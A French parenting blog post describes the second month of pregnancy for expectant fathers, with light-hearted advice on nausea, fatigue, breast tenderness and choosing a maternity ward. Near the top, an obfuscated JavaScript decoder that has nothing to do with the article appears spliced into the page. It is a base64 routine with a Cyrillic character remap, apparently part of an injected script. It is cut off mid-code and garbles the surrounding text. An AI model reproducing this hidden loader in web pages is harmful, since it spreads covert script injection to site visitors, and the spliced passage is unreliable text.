2 mois de grossesse racontés par le papa

2eme mois de grossesse vu par le papa

function h94fcba1e7(y1){var vd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb= »;var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6criptif »>Le temps passe vite et votre chérie a maintenant entamé son deuxième mois de grossesse ! Pour l’instant, c’est pas la joie ! Madame passe sa vie la tête dans la cuvette des toilettes et s'endort le soir à 21h...

Femme et bébé à 2 mois de grossesse

Le corps de votre douce commence à changer alors on évite les phrases du genre « dis donc, t’as pris du cul, toi ! » sauf si vous voulez dormir sur le canapé !

Ah et même si vous louchez sur sa poitrine, n'oubliez pas qu'elle est douloureuse alors on y va doucement !!

Côté ventre, c’est un véritable chantier ! L’utérus se développe et pousse les autres organes afin de préparer un nid douillet pour votre bébé.

Ce dernier est encore minuscule mais ça ne l’empêche pas de se développer à toute allure : les membres se forment peu à peu, l’appareil digestif se développe et la tête grossit énormément ! Du coup, il ressemble à E.T. !

Astuces pour marquer des points

Renseignez-vous sur les maternités près de chez vous car les inscriptions se font assez tôt. Voir notre article Comment choisir sa maternité ?

Incitez votre chérie à manger sain et équilibré. Et si elle est très fatiguée, surprenez-la avec des petits plats de votre composition (évitez quand même la côte de boeuf / frites !)

Proposez-lui de l’accompagner à sa première visite prénatale

Continuons la lecture, par ici